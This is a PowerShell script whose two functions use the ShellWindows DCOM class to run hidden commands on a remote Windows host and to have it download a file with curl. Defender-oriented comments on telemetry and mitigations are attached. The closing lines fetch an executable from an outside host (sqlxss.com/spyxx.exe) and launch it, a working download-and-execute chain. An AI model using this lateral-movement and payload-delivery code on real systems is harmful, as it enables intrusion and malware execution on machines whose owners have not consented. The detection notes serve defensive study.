function ExecDCOM($ip = "127.0.0.1", $cmd = "notepad.exe")
{
<#
.SYNOPSIS
Runs a command line on a host by activating the ShellWindows COM class over DCOM
and calling ShellExecute on the Shell.Application object it exposes.

.PARAMETER ip
Host name or address passed to GetTypeFromCLSID as the activation server.
Defaults to loopback.

.PARAMETER cmd
Text appended unquoted after "cmd.exe /c ", so cmd.exe interprets any
metacharacters it contains.

.OUTPUTS
Whatever ShellExecute returns; presumably $null, since the Shell automation
method is not documented to return a value (confirm).

.NOTES
Defender view: this is the ShellWindows DCOM execution pattern. The new process
is created by the target's already-running explorer.exe in the interactive
user's session (an Explorer window object must exist for item() to return one),
not by a service or WMI host. Useful telemetry is process creation where
explorer.exe is the parent of cmd.exe with an unexpected command line
(Security 4688 with command-line auditing, or Sysmon event 1), correlated with
an inbound RPC/DCOM connection and a network logon on the same host.
Mitigations are restricting DCOM remote launch/activation permissions and
blocking inbound RPC between workstations at the host firewall.
#>
# CLSID 9BA05972-F6A8-11CF-A442-00A0C90A8F39 is ShellWindows; the second argument selects the machine to activate it on.
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip);
# Activation happens here; it is subject to the target's DCOM launch/access ACLs and the caller's credentials.
$obj = [System.Activator]::CreateInstance($com);
# item() with no index returns one open shell window object; fails if none exists on the target.
$item = $obj.item();
# Arguments: file, arguments, working directory, verb ($null = default), show (0 = hidden window).
$ret = $item.Document.Application.ShellExecute("cmd.exe","/c " + $cmd,"c:\windows\system32",$null,0);
return $ret;
}
function DownloadDCOM($ip = "127.0.0.1", $url = "notepad.exe", $dir = $env:temp)
{
<#
.SYNOPSIS
Has a host fetch a URL with curl by invoking ShellExecute through the
ShellWindows COM class activated over DCOM.

.PARAMETER ip
Host name or address passed to GetTypeFromCLSID as the activation server.
Defaults to loopback.

.PARAMETER url
Appended unquoted after "-O ", so curl saves the response under the URL's last
path segment. NOTE(review): the default "notepad.exe" is not a URL and looks
copied from ExecDCOM.

.PARAMETER dir
Working directory for curl, and therefore where the file is written. The
default $env:temp is expanded in the caller's session, not on the target.

.OUTPUTS
Whatever ShellExecute returns; presumably $null (confirm). The function does
not wait for the transfer and does not report whether it succeeded.

.NOTES
Defender view: the download is performed by the target itself, so the outbound
HTTP request and the file write originate from a curl process whose parent is
explorer.exe. Nothing verifies the origin or integrity of what is fetched
(no hash or signature check). Detection candidates are explorer.exe spawning
curl with a hidden window, new executables appearing in a user temp directory,
and proxy/DNS logs for the requested host.
#>
# Same ShellWindows CLSID and remote-activation path as ExecDCOM.
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip);
$obj = [System.Activator]::CreateInstance($com);
# item() with no index returns one open shell window object; fails if none exists on the target.
$item = $obj.item();
# "curl" is resolved on the target by ShellExecute; show = 0 keeps the window hidden.
$ret = $item.Document.Application.ShellExecute("curl","-O " + $url, $dir, $null, 0);
return $ret;
}
# Demo run against loopback: fetch an executable over plain HTTP into the temp
# directory, then launch it through cmd.exe. The two calls are not synchronised,
# so the second can start before the download has finished.
# NOTE(review): the binary is unauthenticated and unverified; the URL host and the
# file name spyxx.exe are usable as search terms in proxy, DNS and EDR data.
DownloadDCOM "127.0.0.1" "http://sqlxss.com/spyxx.exe"
ExecDCOM "127.0.0.1" ($env:temp + "/spyxx.exe")